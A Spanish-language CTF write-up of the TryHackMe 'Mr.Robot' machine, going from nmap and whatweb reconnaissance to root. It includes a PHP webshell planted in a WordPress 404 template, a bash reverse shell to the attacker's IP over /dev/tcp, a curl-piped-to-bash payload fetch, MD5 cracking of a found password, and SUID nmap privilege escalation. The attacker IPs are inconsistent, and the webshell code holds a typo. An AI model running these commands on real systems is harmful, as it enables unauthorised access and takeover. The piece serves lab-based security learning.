Maquina Mr.RobotCTF de TryHackMe (No necesario VIP)
Anonymous ~ TryHackMe
Realizamos el Primer escaneo con Nmap
$" nmap -p- --open -sS --min-rate 4000 -vvv -n -Pn -oG allports 10.10.158.107 "
Procedemos con el siguiente escaneo de Nmap
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.41 seconds
Procedemos con la herramienta Whatweb:
"# wtw 10.10.158.107 " 1 ⨯
http://10.10.158.107 [200 OK] Apache, Country[RESERVED][ZZ], HTML5, HTTPServer[Apache], IP[10.10.158.107], Script, UncommonHeaders[x-mod-pagespeed], X-Frame-Options[SAMEORIGIN]
"# wtw 10.10.158.107:443 "
http://10.10.158.107:443 [400 Bad Request] Apache, Country[RESERVED][ZZ], HTTPServer[Apache], IP[10.10.158.107], Title[400 Bad Request], X-Frame-Options[SAMEORIGIN]
Procedemos a hechar un vistazo visual a la pagina web por el puerto 80:
INVESTIGANDO POR LA PAGINA WEB ENCONTRAMOS:
1.- http://10.10.158.107/wp-login.php
2.- http://10.10.158.107/comments/ – SEGUIMOS POR AQUI
3.-Probamos a hacer un Simple Fuzzing web ya que el script de nmap esta tardando muchisimo
4.- Buscamos por la ruta de robots.txt:
Encontramos un diccionario `fsociety.txt`que nos descargamos y la primera flag
5.- Seguimos enumerando diferentes archivos a nivel de ruta license.txt:
encontramos esta cadena "ZWxsaW90OkVSMjgtMDY1Mgo="
# echo "ZWxsaW90OkVSMjgtMDY1Mgo=" | base64 -d
elliot : ER28-0552 -- que nos permite entrar en el CMS WORDPRESS
Acceso Inicial desde el Wordpress modificando la plantilla 404.php
Una vez tenemos acceso al Wordpress vamos a repetir el mismo proceso realizado en otras maquinas en la plataforma de HTB mediante en el cual modificando la plantilla de la pagina 404.php por en este caso lo siguiente:
Una webshell facilita para poder ejecutar comandos desde la url
<?php
system($_RESQUEST['cmd']);
?>
Luego nos montamos un servidor que nos postee un script.sh que nos envie una R_shell a nuestra IP por el 443:
#!/bin/bash
bash -c 'bash -i >& /dev/tcp/10.9.4.60/443'
Para luego apuntar desde el 404.php y pipearlo "[ | ]" con Bash:
" http://10.10.158.107/asdfasdfa?cmd=curl%20http://10.9.4.182/script.sh|bash "
Accedemos y nos hacemos la consola interactiva con python esta vez:
python -c 'import pty; pty.spawn("/bin/bash")
ctrl+Z
Vemos que tenemos un la flag en /home/robot/user.txt y que no podemos leerla. Pero podemos ver la pass del user Robot almacenada en la misma carpeta.
robot:c3fcd3d76192e4007dfb49xxxxxxxx en md5
La crackeamos con CrackStation.com
Procedemos a hacer un cambio de usuario con el comando su y conseguimos la flag user.txt
Escalada de Privilegios hasta el user Root
Procedemos como siempre a enumerar de distintas formas la maquina: 1.- Permisos SUID
$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/nmap --SUID
Con el binario de nmap como SUID procedemos asi:
nmap --interactive
nmap> !sh
"robot@linux:~$ /usr/local/bin/nmap --interactive "
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
"nmap> !sh "
# whoami
root
#
Ya estariamos como root y podriamos sacar la flag root.txt.
Maquina Mr.Robots Rooteada =)